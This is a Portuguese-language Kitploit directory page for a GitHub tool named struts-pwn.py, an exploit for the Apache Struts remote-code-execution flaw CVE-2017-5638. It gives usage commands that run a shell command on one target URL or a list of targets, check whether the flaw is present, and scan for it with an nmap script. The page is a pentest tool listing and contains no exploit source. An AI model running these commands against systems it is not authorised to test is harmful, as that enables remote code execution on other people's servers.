Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Apache-Struts — An exploit for Apache Struts CVE-2017-5638 | Kitploit
Ferramentas/GitHubGitHub/c002/apache-struts
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubc002/apache-struts

Apache-Struts

An exploit for Apache Struts CVE-2017-5638

Ver Repositório
há 9 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Apache-Struts

Um exploit para o Apache Struts CVE-2017-5638

Uso

Testando uma única URL.

python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'

Recon do Nmap

nmap -p <port> --script http-vuln-cve2017-5638 <target>'

Testando uma lista de URLs.

python struts-pwn.py --list 'urls.txt' -c 'id'

Verificando se a vulnerabilidade existe em uma única URL.

python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'

Verificando se a vulnerabilidade existe em uma lista de URLs.

python struts-pwn.py --check --list 'urls.txt'

Baixar ferramenta